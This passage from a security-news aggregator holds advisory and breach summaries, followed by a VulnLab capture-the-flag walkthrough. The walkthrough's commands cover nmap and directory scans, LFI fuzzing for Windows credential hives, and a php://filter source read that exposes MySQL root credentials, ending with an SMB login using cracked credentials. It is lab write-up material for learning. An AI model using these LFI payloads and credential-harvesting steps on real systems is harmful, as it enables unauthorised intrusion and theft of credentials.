sensitive information. NULL Pointer Dereference: Application crashes or unpredictable behavior. Improper Input Validation: Malicious input bypassing security checks. Path Traversal: Unauthorized file system access. Incorrect Authorization & Improper Access Control: Attackers gaining higher privileges. Stored Cross-Site Scripting (XSS): Injection of malicious scripts into applications. Use After Free: Exploiting released memory pointers for arbitrary code execution. Time-of-Check to Time-of-Use (TOCTOU) Race Condition: Exploiting system state changes during execution. Stack-Based Buffer Overflow: Execution of attacker-controlled code. Temporary File Creation with Incorrect Permissions: Unauthorized access to sensitive files. Mitigation and Recommended Actions CERT-In strongly recommends applying security patches as soon as possible to prevent exploitation. Users and administrators should: Update Software: Apply the latest security updates available on the Adobe Security Bulletin. Monitor System Activity: Regularly check for unusual activities or unauthorized access. Restrict Privileges: Minimize user privileges to reduce potential impact. Enable Security Features: Use built-in security controls such as access controls and firewalls. Regular Backups: Maintain updated backups to ensure data recovery in case of an attack. Security Awareness: Educate users on recognizing phishing attempts and suspicious activities. Conclusion The vulnerabilities reported in Adobe products highlight the growing need for proactive security measures in software environments. System administrators and security teams must act swiftly to apply patches and implement best practices to safeguard their infrastructure. Organizations relying on Adobe products should remain vigilant, ensuring that security updates are promptly installed to prevent potential exploitation. Staying updated and following security advisories is crucial in mitigating threats and maintaining a secure digital ecosystem. References https://www.cert-in.org.in The post CERT-In Issues Critical Warning on Adobe Software Security Flaws appeared first on Cyble.

by CYBLE

by Dark Reading

London, United Kingdom, 18th February 2025, CyberNewsWire

by Hackread

by KnowBe4

Financial software firm Finastra is notifying individuals whose personal information was stolen in a recent data breach. The post Finastra Starts Notifying People Impacted by Recent Data Breach appeared first on SecurityWeek.

by SecurityWeek

What do data centres hidden under Romanian castles, data mining, deepfakes, fight-scenes, on-screen kisses and AI supercomputers have in common? Security awareness training. Yes, seriously – and that’s just season six of KnowBe4’s The Inside Man. There’s plenty more (five other seasons in fact) where that came from.  Yes, Mark Shepherd and co are back […] The post KnowBe4’s Explosive Inside Man Series Back For Season 6 appeared first on IT Security Guru.

by IT Security Guru

A critical vulnerability tracked as CVE-2025-21589 has been patched in Juniper Networks’ Session Smart Router. The post Critical Vulnerability Patched in Juniper Session Smart Router appeared first on SecurityWeek.

by SecurityWeek

Lee Enterprises has officially confirmed that the cyberattack disrupting its newspaper operations since early February was a ransomware incident. In an 8-K filing submitted to the U.S. Securities and Exchange Commission (SEC), the publishing company acknowledged that attackers encrypted critical applications and exfiltrated certain files, though it remains unclear whether sensitive data was compromised. The … The post Lee Enterprises Confirms Ransomware Behind System Outage appeared first on CyberInsider.

by Cyber Insider

At KnowBe4, we constantly strive to stay ahead of emerging threats and create training content to warn users about the latest tactics used by cybercriminals.

by KnowBe4

Several Russian threat actors, including the SVR’s Cozy Bear, are launching highly targeted spear phishing attacks against Microsoft 365 accounts, according to researchers at Volexity.

by KnowBe4

Overview A critical security vulnerability has been identified in PHP, one of the most widely used server-side scripting languages for web development. The vulnerability, tracked as CVE-2022-31631, affects multiple versions of PHP and poses a significant risk to websites and applications relying on the PHP Data Objects (PDO) extension for SQLite database interactions. The flaw, which stems from an integer overflow issue in the PDO::quote() function, has the potential to allow SQL injection attacks, leading to unauthorized access, data breaches, and system compromise. Key Details CVE ID: CVE-2022-31631 CVSS Base Score: 9.1 (Critical) Affected Component: PDO::quote() function when used with SQLite databases Impact: SQL injection vulnerability due to improper string sanitization Published Date: February 12, 2025 Last Modified: February 13, 2025 Source: PHP Group Severity Level: Critical Affected PHP Versions The vulnerability affects the following versions of PHP: PHP 8.0.x before 8.0.27 PHP 8.1.x before 8.1.15 PHP 8.2.x before 8.2.2 Fixed Versions The issue has been addressed in the following PHP versions: PHP 8.0.27 PHP 8.1.15 PHP 8.2.2 (or later) Technical Description The vulnerability resides in the PDO::quote() function, which is designed to safely escape user-supplied input before including it in SQL queries. However, in the affected versions, providing an overly long string as input can cause an integer overflow, leading to improper string sanitization. This flaw allows attackers to inject malicious SQL code, potentially compromising the security of the entire database. Potential Exploitation If successfully exploited, this vulnerability can allow attackers to: Inject malicious SQL code into the database Gain unauthorized control over the database Steal sensitive data, including credentials and personal information Modify or delete database content Potentially compromise the entire system, depending on the application''s privileges Impact and Severity While the primary risk of CVE-2022-31631 is SQL injection, secondary impacts include Denial of Service (DoS) scenarios where the system becomes unresponsive due to excessive queries. The risk level is high, given that SQL injection is one of the most dangerous web application vulnerabilities, often leading to full system compromise. CVSS Score Breakdown The vulnerability has been assigned a CVSS v3.1 base score of 9.1 (Critical), with the following vector details: Attack Vector (AV): Network (N) Attack Complexity (AC): High (H) Privileges Required (PR): None (N) User Interaction (UI): None (N) Scope (S): Unchanged (U) Confidentiality Impact (C): None (N) Integrity Impact (I): None (N) Availability Impact (A): High (H) While the high attack complexity may limit mass exploitation, sophisticated attackers can leverage this vulnerability to conduct targeted attacks on vulnerable PHP applications. Mitigation Strategies and Recommended Actions To mitigate the risk associated with CVE-2022-31631, affected users should take the following steps: Update PHP Immediately: Upgrade to PHP versions 8.0.27, 8.1.15, or 8.2.2 (or later) to eliminate the vulnerability. Apply Security Patches: If upgrading is not immediately possible, apply security patches provided by the PHP development team. Validate Input Data: Ensure all user inputs are properly validated and sanitized before passing them to the database. Use Parameterized Queries: Instead of relying on PDO::quote(), utilize prepared statements and parameterized queries to prevent SQL injection. Monitor Database Activity: Implement monitoring and logging to detect suspicious database queries and mitigate potential attacks in real time. Perform Security Audits: Regularly conduct security assessments and penetration testing to identify and address vulnerabilities in your web application. Workarounds Currently, no workarounds are available for this vulnerability. The only reliable mitigation is upgrading to a patched version of PHP. NetApp has acknowledged public discussions regarding CVE-2022-31631 and its implications. While no active exploits have been reported in the wild, the public disclosure of this vulnerability increases the likelihood of exploitation. Organizations using affected PHP versions should treat this as a priority issue and remediate it immediately. Conclusion CVE-2022-31631 is a critical security vulnerability in PHP that exposes applications to potential SQL injection attacks due to an integer overflow issue in the PDO::quote() function for SQLite databases. Given the high severity score and the risk of data breaches, system compromise, and denial-of-service (DoS) attacks, affected users are strongly urged to update their PHP installations immediately. Organizations should also adopt best practices such as input validation, parameterized queries, and continuous security monitoring to mitigate the risks associated with SQL injection vulnerabilities. References: https://jocert.ncsc.jo/EN/ListDetails/Security_Alerts__Advisorites/1203/98 https://security.netapp.com/advisory/ntap-20230223-0007/ The post CVE-2022-31631: High-Risk PHP Vulnerability Demands Immediate Patch appeared first on Cyble.

by CYBLE

This post first appeared on blog.netwrix.com and was written by Dirk Schrader.Introduction to Brute Force Attacks A brute force attack is a trial-and-error technique used by cybercriminals to gain access to sensitive information such as passwords, encryption keys, or login credentials. Essentially, it involves systematically attempting every possible password combination until the correct one is found. It’s akin to a thief trying to open a combination … Continued

by Netwrix

The Chinese APT hacking group ""Mustang Panda"" has been spotted abusing the Microsoft Application Virtualization Injector utility as a LOLBIN to inject malicious payloads into legitimate processes to evade detection by antivirus software. [...]

by BleepingComputer

Singulr AI announced its launch with $10 million in seed funding raised for an enterprise AI security and governance platform.  The post Singulr Launches With $10M in Funding for AI Security and Governance Platform appeared first on SecurityWeek.

by SecurityWeek

A newly discovered Golang backdoor is abusing Telegram for communication with its command-and-control (C&C) server. The post Golang Backdoor Abuses Telegram for C&C Communication appeared first on SecurityWeek.

by SecurityWeek

The heart of the Silicon Valley faces opportunities and challenges as it maps out the future of energy.

by ITPro Today

Lee said it was analyzing whether sensitive or personal data was stolen in the cyberattack. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Security vulnerabilities have been disclosed in Xerox VersaLink C7025 Multifunction printers (MFPs) that could allow attackers to capture authentication credentials via pass-back attacks via Lightweight Directory Access Protocol (LDAP) and SMB/FTP services. ""This pass-back style attack leverages a vulnerability that allows a malicious actor to alter the MFP''s configuration and cause the MFP

by The Hacker News

ProcessUnity announced the next generation of the Global Risk Exchange. This platform transforms the third-party assessment process, reducing friction for both organizations and their third parties while streamlining vendor onboarding and accelerating assessment cycles. “The Global Risk Exchange makes the third-party assessment process easier for everyone involved while better protecting organizations’ sensitive data and business operations,” said ProcessUnity CEO Sean Cronin. “Our assessment data eliminates the duplicative assessment requests multiple organizations place on the same … More → The post ProcessUnity accelerates third-party assessments appeared first on Help Net Security.

by Help Net Security

The newspaper chain said attackers encrypted critical applications and impacted billing, payments and print distribution.

by Cybersecurity Dive

OpenSSH has released security updates addressing two vulnerabilities, a man-in-the-middle (MitM) and a denial of service flaw, with one of the flaws introduced over a decade ago. [...]

by BleepingComputer

​Juniper Networks has patched a critical vulnerability that allows attackers to bypass authentication and take over Session Smart Router (SSR) devices. [...]

by BleepingComputer

Limited human resources, the complexity in workflows, and the overwhelming volume of threats point to one critical need: streamlined processes that elevate both incident detection and mitigation. Addressing these challenges head-on, Picus is proud to introduce our latest solution: Planner.

by Picus Security

Cloud Controller Manager is a crucial yet often overlooked Kubernetes component that streamlines cloud integrations. Here''s why it matters and how to use it effectively.

by ITPro Today

Microsoft has observed a new variant of the XCSSET malware being used in limited attacks against macOS users. The post Microsoft Warns of Improved XCSSET macOS Malware appeared first on SecurityWeek.

by SecurityWeek

Think you''re safe because you''re compliant? Think again. Recent studies continue to highlight the concerning trend that compliance with major security frameworks does not necessarily prevent data breaches. Learn more from Pentera on how automated security validation bridges the security gaps. [...]

by BleepingComputer

In the context of the leak at major location-data broker Gravy Analytics, we explain why you need to protect your location data — and how.

by Kaspersky

The Qualys Threat Research Unit (TRU) has disclosed two critical vulnerabilities in OpenSSH—CVE-2025-26465 and CVE-2025-26466 — affecting both the client and server components. The first allows machine-in-the-middle (MitM) attacks against the OpenSSH client when the VerifyHostKeyDNS option is enabled. The second enables an asymmetric denial-of-service (DoS) attack that consumes both memory and CPU, affecting both … The post OpenSSH Vulnerabilities Exposed Millions to Multi-Year Risks appeared first on CyberInsider.

by Cyber Insider

Palo Alto Networks has confirmed that a recently patched firewall vulnerability tracked as CVE-2025-0108 is being actively exploited. The post Palo Alto Networks Confirms Exploitation of Firewall Vulnerability appeared first on SecurityWeek.

by SecurityWeek

Chase Bank customers sending Zelle payments may be sought to provide details, including payment purpose and means of contact with recipients, said the bank in an updated user policy.

by SC Media

Such newly raised funds would be channeled toward creating more advanced AI models for defending critical infrastructure and bolstering its current models, while opening new offices in the U.S. and South America, according to Dream, which was co-founded by former NSO Group CEO Shalev Hulio and former Austrian Prime Minister Sebastian Kurz.

by SC Media

Evaluation of the firm''s online resources led to the identification of a DockerHub organization containing a Docker image that not only contained the company''s backend systems source code but also a .git folder with a GitHub Actions authorization token.

by SC Media

Threat actors with configuration page access to VersaLink printers with proper Lightweight Directory Access Protocol settings could enable IP address alterations and clear-text LDAP service credential compromise, according to Rapid7 researchers.

by SC Media

Cybersecurity researchers have flagged a credit card stealing malware campaign that has been observed targeting e-commerce sites running Magento by disguising the malicious content within image tags in HTML code in order to stay under the radar. MageCart is the name given to a malware that''s capable of stealing sensitive payment information from online shopping sites. The attacks are known to

by The Hacker News

""This temporary suspension of the DeepSeek app restricts new app downloads from the app market, and we ask existing users to use it cautiously, such as not entering personal information in the DeepSeek input window (prompt) until the final results are announced,"" said the PIPC, which committed to bolstering data privacy guidance and compliance checking efforts.

by SC Media

Both Google and Apple have already been sought by Texas Attorney General Ken Paxton to provide documents submitted by DeepSeek to be published on their respective app stores, as well as their analyses of the AI app.

by SC Media

RansomHub, a ransomware-as-a-service variant formerly known as Cyclops and Knight, has become one of the most pervasive threats to critical sectors—from water and wastewater systems to healthcare and transportation. Leveraging a double-extortion model, RansomHub encrypts systems and exfiltrates data while demanding ransoms from victims. 

by Picus Security

Russian state-sponsored hackers have attacked enterprises and government agencies in North America and overseas.

by Cybersecurity Dive

A free game called PirateFi, available on Steam, was found distributing the Vidar info-stealing malware to unsuspecting users. The post PirateFi game on Steam spreads massive malware appeared first on ZENDATA Cybersecurity.

by Zendata

Kaspersky GReAT experts have discovered a new campaign distributing the XMRig cryptominer through popular games such as BeamNG.drive and Dyson Sphere Program on torrent trackers.

by Securelist

by ComputerWeekly

Israeli cybersecurity startup Dream has raised $100 million in Series B funding and is now valued at $1.1 billion. The post Ex-NSO Group CEO’s Security Firm Dream Raises $100M at $1.1B Valuation appeared first on SecurityWeek.

by SecurityWeek

The flaw, when chained together with a prior vulnerability, can allow an attacker to gain access to unpatched firewalls.

by Cybersecurity Dive

by ComputerWeekly

by ComputerWeekly

Xerox VersaLink C7025 Multifunction printer flaws could allow attackers to capture authentication credentials via pass-back attacks via LDAP and SMB/FTP services. Rapid7 researchers discovered vulnerabilities in Xerox Versalink C7025 Multifunction printers (MFPs) that could allow attackers to capture authentication credentials via pass-back attacks via LDAP and SMB/FTP services. The vulnerabilities are: The vulnerabilities impact Xerox […]

by Security Affairs

by ComputerWeekly

Newspaper publishing giant Lee Enterprises has confirmed that a ransomware attack is behind ongoing disruptions impacting the group''s operations for over two weeks. [...]

by BleepingComputer

Microsoft discovered a new variant of the Apple macOS malware XCSSET that was employed in limited attacks in the wild. Microsoft Threat Intelligence discovered a new variant of the macOS malware XCSSET in attacks in the wild. XCSSET is a sophisticated modular macOS malware that targets users by infecting Xcode projects, it has been active since at […]

by Security Affairs

In this Help Net Security, Oded Hareven, CEO of Akeyless Security, discusses how enterprises should adapt their cybersecurity strategies to address the growing need for machine-to-machine (M2M) security. According to Hareven, machine identities must be secured and governed similarly to human identities, focusing on automation and policy-as-code. How should enterprises reframe their cybersecurity strategies to account for machine-to-machine interactions? Enterprises need to recognize that machine-to-machine interactions have fundamentally different identity requirements than human-to-system interactions. Traditional … More → The post The risks of autonomous AI in machine-to-machine interactions appeared first on Help Net Security.

by Help Net Security

by ComputerWeekly

📌Overview:First, it’s Maverick — did you miss me?! 😎 Here we go again, another black-hat-style adventure with an awesome machine from VulnLab! Buckle up, because this one’s got everything — web hacking, RDP bypasses, and some serious AD trust abuse.It all starts with a web application, your golden ticket to initial access (because honestly, what’s an AD machine without a vulnerable web app?). From there, things escalate quickly. I managed to bypass Restricted Mode on RDP (because restrictions are just suggestions, right?), pop a full session, and unleash chaos on AD trusts.Expect Kerberos magic, token shenanigans, and a moment where you question if Microsoft secretly enjoys red teamers breaking their security. In the end, domain admin falls like a house of cards, and I walk away like a legend. 🔥The Scopetrusted.vl : 10.10.231.181nmap -sCV 10.10.231.181 -oN nmap_181 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 20:26 EETNmap scan report for 10.10.231.181Host is up (0.61s latency).Not shown: 990 closed tcp ports (reset)PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-15 18:34:06Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3389/tcp open ms-wbt-server Microsoft Terminal Services|_ssl-date: 2025-02-15T18:34:49+00:00; +7m03s from scanner time.| ssl-cert: Subject: commonName=trusteddc.trusted.vl| Not valid before: 2025-02-14T18:32:04|_Not valid after: 2025-08-16T18:32:04| rdp-ntlm-info: | Target_Name: TRUSTED| NetBIOS_Domain_Name: TRUSTED| NetBIOS_Computer_Name: TRUSTEDDC| DNS_Domain_Name: trusted.vl| DNS_Computer_Name: trusteddc.trusted.vl| Product_Version: 10.0.20348|_ System_Time: 2025-02-15T18:34:40+00:00Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:| smb2-time: | date: 2025-02-15T18:34:40|_ start_date: N/A| smb2-security-mode: | 3:1:1: |_ Message signing enabled and required|_clock-skew: mean: 7m03s, deviation: 0s, median: 7m03sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 106.21 secondslab.trusted.vl : 10.10.231.182 nmap -sCV 10.10.231.182 -oN nmap_182 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 20:27 EETStats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 99.99% done; ETC: 20:27 (0:00:00 remaining)Stats: 0:02:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service ScanService scan Timing: About 6.67% done; ETC: 20:29 (0:00:14 remaining)Nmap scan report for 10.10.231.182Host is up (0.56s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)| http-title: Welcome to XAMPP|_Requested resource was http://10.10.231.182/dashboard/|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.688/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-15 18:36:27Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)| tls-alpn: |_ http/1.1| http-title: Welcome to XAMPP|_Requested resource was https://10.10.231.182/dashboard/|_ssl-date: TLS randomness does not represent time|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6| ssl-cert: Subject: commonName=localhost| Not valid before: 2009-11-10T23:48:47|_Not valid after: 2019-11-08T23:48:47445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)3269/tcp open tcpwrapped3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB| mysql-info: | Protocol: 10| Version: 5.5.5-10.4.24-MariaDB| Thread ID: 9| Capabilities flags: 63486| Some Capabilities: Support41Auth, LongColumnFlag, InteractiveClient, IgnoreSigpipes, SupportsTransactions, ConnectWithDatabase, Speaks41ProtocolOld, FoundRows, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsCompression, ODBCClient, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins| Status: Autocommit| Salt: A$/^m)#r6W1/8j.FV\KC|_ Auth Plugin Name: mysql_native_password3389/tcp open ms-wbt-server Microsoft Terminal Services|_ssl-date: 2025-02-15T18:37:20+00:00; +7m03s from scanner time.| ssl-cert: Subject: commonName=labdc.lab.trusted.vl| Not valid before: 2025-02-14T18:32:04|_Not valid after: 2025-08-16T18:32:04| rdp-ntlm-info: | Target_Name: LAB| NetBIOS_Domain_Name: LAB| NetBIOS_Computer_Name: LABDC| DNS_Domain_Name: lab.trusted.vl| DNS_Computer_Name: labdc.lab.trusted.vl| DNS_Tree_Name: trusted.vl| Product_Version: 10.0.20348|_ System_Time: 2025-02-15T18:37:03+00:00Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 7m02s, deviation: 0s, median: 7m02s| smb2-security-mode: | 3:1:1: |_ Message signing enabled and required| smb2-time: | date: 2025-02-15T18:37:05|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 209.81 secondsThere are many ways to get initial access — one from the web and another using MySQL credentials. But to be honest, I don’t want to dig too deep at this stage because the machine is called “Trusted”, so we need to focus on the Trust Attack rather than exploring multiple initial access paths.🎯Step Back: Mapping the Attack SurfaceBut let’s take a step back. We have two IPs in scope: trusted.vl and lab.trusted.vl. We need to enumerate every single service from scanning, like SMB, LDAP, and Kerberos, just as I mentioned in my latest blog posts. You have to be organized when solving any AD machine to get good results.But we also have a web app, and it seems to contain some good stuff. However, let’s imagine we don’t have a web app in this scenario. In that case, we should start by testing for valid Kerberos users, then move on to Kerberoasting and AS-REP Roasting. And of course, when testing SMB, always check for anonymous login — because if you’re lucky, you might just find some user accounts from it or even from LDAP.Port 80As you can see, it’s a web server. So when I see that, I immediately start fuzzing for directories because I might find some juicy ones through fuzzing. So, let’s fuzz!┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]└─# gobuster dir -u http://10.10.231.182/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt ===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.10.231.182/[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.6[+] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.htaccess (Status: 403) [Size: 302]/.hta (Status: 403) [Size: 302]/.htpasswd (Status: 403) [Size: 302]/aux (Status: 403) [Size: 302]/cgi-bin/ (Status: 403) [Size: 302]/com4 (Status: 403) [Size: 302]/com3 (Status: 403) [Size: 302]/com2 (Status: 403) [Size: 302]/com1 (Status: 403) [Size: 302]/con (Status: 403) [Size: 302]/dashboard (Status: 301) [Size: 342] [--> http://10.10.231.182/dashboard/]/dev (Status: 301) [Size: 336] [--> http://10.10.231.182/dev/]/examples (Status: 503) [Size: 402]/favicon.ico (Status: 200) [Size: 30894]/img (Status: 301) [Size: 336] [--> http://10.10.231.182/img/]/index.php (Status: 302) [Size: 0] [--> http://10.10.231.182/dashboard/]/licenses (Status: 403) [Size: 421]/lpt1 (Status: 403) [Size: 302]/lpt2 (Status: 403) [Size: 302]/nul (Status: 403) [Size: 302]/phpmyadmin (Status: 403) [Size: 302]/prn (Status: 403) [Size: 302]/server-info (Status: 403) [Size: 421]/server-status (Status: 403) [Size: 421]/webalizer (Status: 403) [Size: 302]Progress: 4734 / 4735 (99.98%)===============================================================Finished===============================================================Hmm, /dev looks interesting 👀. After opening it, I had a feeling — this might be vulnerable to LFI 🤔. So, I started fuzzing again!└─# ffuf -u "http://10.10.231.182/dev/index.html?view=index.html?file=FUZZ" -w /usr(6 results) 20:51:19 [341/370]ing/LFI/LFI-gracefulsecurity-windows.txt /''___\ /''___\ /''___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.231.182/dev/index.html?view=index.html?file=FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ C:/apache/php/php.ini [Status: 200, Size: 1131, Words: 58, Lines: 35, Duration: 561ms] C:/apache/logs/access.log [Status: 200, Size: 1139, Words: 58, Lines: 35, Duration: 566ms]C:/Users/Administrator/NTUser.dat [Status: 200, Size: 1155, Words: 58, Lines: 35, Duration: 578ms] C:/MySQL/data/mysql.err [Status: 200, Size: 1135, Words: 58, Lines: 35, Duration: 589ms]C:/php5/php.ini [Status: 200, Size: 1119, Words: 58, Lines: 35, Duration: 577ms] C:/MySQL/data/hostname.err [Status: 200, Size: 1141, Words: 58, Lines: 35, Duration: 604ms]C:/apache/logs/error.log [Status: 200, Size: 1137, Words: 58, Lines: 35, Duration: 614ms] C:/inetpub/wwwroot/global.asa [Status: 200, Size: 1147, Words: 58, Lines: 35, Duration: 614ms] C:/MySQL/my.cnf [Status: 200, Size: 1119, Words: 58, Lines: 35, Duration: 628ms] C:/boot.ini [Status: 200, Size: 1111, Words: 58, Lines: 35, Duration: 641ms] C:/MySQL/data/mysql.log [Status: 200, Size: 1135, Words: 58, Lines: 35, Duration: 639ms] C:/WINDOWS/Repair/SAM [Status: 200, Size: 1131, Words: 58, Lines: 35, Duration: 676ms] C:/MySQL/my.ini [Status: 200, Size: 1119, Words: 58, Lines: 35, Duration: 716ms]C:/php4/php.ini [Status: 200, Size: 1119, Words: 58, Lines: 35, Duration: 719ms]C:/WINDOWS/php.ini [Status: 200, Size: 1125, Words: 58, Lines: 35, Duration: 729ms] C:/php/php.ini [Status: 200, Size: 1117, Words: 58, Lines: 35, Duration: 736ms]C:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 1163, Words: 58, Lines: 35, Duration: 593ms]C:/Windows/repair/security [Status: 200, Size: 1141, Words: 58, Lines: 35, Duration: 605ms]C:/WINNT/win.ini [Status: 200, Size: 1121, Words: 58, Lines: 35, Duration: 595ms]C:/xampp/apache/bin/php.ini [Status: 200, Size: 1143, Words: 58, Lines: 35, Duration: 590ms]C:/Windows/Panther/Unattend/Unattended.xml [Status: 200, Size: 1173, Words: 58, Lines: 35, Duration: 578ms]C:/Windows/Panther/Unattended.xml [Status: 200, Size: 1155, Words: 58, Lines: 35, Duration: 570ms]C:/Windows/debug/NetSetup.log [Status: 200, Size: 1147, Words: 58, Lines: 35, Duration: 610ms] C:/Windows/system32/config/AppEvent.Evt [Status: 200, Size: 1167, Words: 58, Lines: 35, Duration: 622ms]C:/Windows/system32/config/SecEvent.Evt [Status: 200, Size: 1167, Words: 58, Lines: 35, Duration: 608ms] C:/Windows/system32/config/default.sav [Status: 200, Size: 1165, Words: 58, Lines: 35, Duration: 617ms]C:/Windows/system32/config/security.sav [Status: 200, Size: 1167, Words: 58, Lines: 35, Duration: 618ms]C:/Windows/system32/config/software.sav [Status: 200, Size: 1167, Words: 58, Lines: 35, Duration: 569ms]C:/Windows/system32/config/system.sav [Status: 200, Size: 1163, Words: 58, Lines: 35, Duration: 572ms]The source of the index.html file can be checked using php://filter to encode its contents in base64. This helps reveal any PHP code that might be executed if it''s in plain text.After viewing the source page, it becomes clear why local file inclusion was possible — it’s using include on a GET parameter and accepting files. Additionally, there’s a comment from Eric mentioning database connection setup. After fuzzing for PHP files, db.php is discovered.┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]└─# ffuf -u "http://10.10.231.182/dev/index.html?view=FUZZ.php" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -fw 58 /''___\ /''___\ /''___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev________________________________________________ :: Method : GET :: URL : http://10.10.231.182/dev/index.html?view=FUZZ.php :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response words: 58________________________________________________db [Status: 200, Size: 763, Words: 26, Lines: 31, Duration: 556ms]system [Status: 200, Size: 892, Words: 47, Lines: 32, Duration: 683ms]pear [Status: 200, Size: 741, Words: 25, Lines: 31, Duration: 702ms]table [Status: 200, Size: 1185, Words: 67, Lines: 38, Duration: 562ms]con [Status: 200, Size: 1079, Words: 56, Lines: 35, Duration: 553ms]aux [Status: 200, Size: 1077, Words: 55, Lines: 35, Duration: 4709ms]http://10.10.231.182/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.phpPD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]└─# echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d<?php $servername = "localhost";$username = "root";$password = "SuperSecureMySQLPassw0rd1337.";$conn = mysqli_connect($servername, $username, $password);if (!$conn) { die("Connection failed: " . mysqli_connect_error());}echo "Connected successfully";?> So, as you can see, we got the MySQL credentials. After that, we log in to MySQL and enumerate the database, where we find hashes. Cracking them gives us the credentials for rsmith. Finally, we validate them using nexec.┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]└─# nxc smb 10.10.231.182 -u ''rsmith'' -p ''IHateEric2'' --shares SMB 10.10.231.182 445 LABDC [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)SMB 10.10.231.182 445 LABDC [+] 